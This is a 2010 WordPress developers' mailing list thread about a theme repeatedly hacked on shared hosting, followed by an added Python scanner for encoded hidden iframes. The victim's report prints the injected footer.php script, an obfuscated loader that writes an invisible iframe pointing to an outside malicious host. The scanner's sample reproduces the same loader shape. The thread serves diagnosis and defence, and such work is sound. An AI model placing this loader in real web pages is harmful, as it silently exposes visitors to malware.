[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Baki Goxhaj banago at gmail.com
Sun Oct 31 18:18:13 UTC 2010


>
> * On shared hosting WP is often the target, but rarely the entrance.*
>

This seems so true.

Kindly,

Baki Goxhaj
www.wplancer.com | www.banago.info | www.lintuts.com


On 31 October 2010 22:45, Ozh <ozh at ozh.org> wrote:

> Typically not a Dreamhost issue, otherwise there would be *thousands*
> of people screaming, and me in first line
>
> Being up to date with WP is fine, but most hacks on shared hosting are
> not done using WP
> - check file permissions <http://codex.wordpress.org/Hardening_WordPress>
> - check other software & scripts running on your blog
> - change your main/SSH/FTP password
> - change your WP password
>
> I once had a WP blog hacked on Dreamhost. A few hours of investigation
> later (checking all the above + inspecting access logs) I found out
> that the insecure stuff was Scuttle (a delicious clone).
>
> On shared hosting WP is often the target, but rarely the entrance.
>
> On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
> <mladen.adamovic at gmail.com> wrote:
> > Hi guys,
> >
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> >
> > I don't know which exploit it did use and couldn't identify it, but it was
> > adding the following code to my default theme footer.php:
> >
> > <script>
> > enc = "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> >
> > I think I'll have to migrate to Blogger, since I couldn't identify exploit
> > it did use.
> >
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> >
>
>
>
> --
> http://ozh.org/
>
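An added example, not part of the thread or any poster's code: a Python check that finds string literals made mostly of percent-escapes (the `unescape()` + `document.write()` pattern reported in footer.php), decodes them, and reports any iframe inside along with whether it is sized to be invisible. The function names and the sample, including its placeholder host `malware.example.invalid`, are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

LITERAL = re.compile(r'"([^"\\\n]*)"|\'([^\'\\\n]*)\'')
ESCAPE = re.compile(r'%(?:u[0-9A-Fa-f]{4}|[0-9A-Fa-f]{2})')

# Constructed sample: a footer.php tail shaped like the snippet in the thread,
# with a placeholder host instead of the reported one.
SAMPLE_FOOTER = '''<?php wp_footer(); ?>
<script>
enc = "%3Ciframe%20width%3D1%20height%3D1%20frameborder%3D0%20src%3D%27http%3A//malware.example.invalid/4/x.php%27%3E%3C/iframe%3E";
dec = unescape(enc);
document.write(dec);
</script>'''

class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))

def js_unescape(s):
    """Approximate JavaScript unescape(): %uXXXX first, then %XX as Latin-1."""
    s = re.sub(r'%u([0-9A-Fa-f]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def is_hidden(attrs):
    """True for 0/1-pixel frames or frames hidden through inline style."""
    tiny = lambda v: bool(re.fullmatch(r'\s*[01](px)?\s*', v or ""))
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) and tiny(attrs.get("height"))) \
        or "display:none" in style or "visibility:hidden" in style

def scan_text(text):
    """Return one finding per iframe found inside a percent-encoded literal."""
    findings = []
    for m in LITERAL.finditer(text):
        literal = m.group(1) or m.group(2) or ""
        if len(ESCAPE.findall(literal)) < 4:   # ordinary strings: skip
            continue
        parser = IframeFinder()
        parser.feed(js_unescape(literal))
        for attrs in parser.frames:
            findings.append({"line": text.count("\n", 0, m.start()) + 1,
                             "src": attrs.get("src"), "hidden": is_hidden(attrs)})
    return findings
```

Running `scan_text` over the contents of each theme file and comparing the modification times of flagged files against the access logs narrows down when the file was written and through which script.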

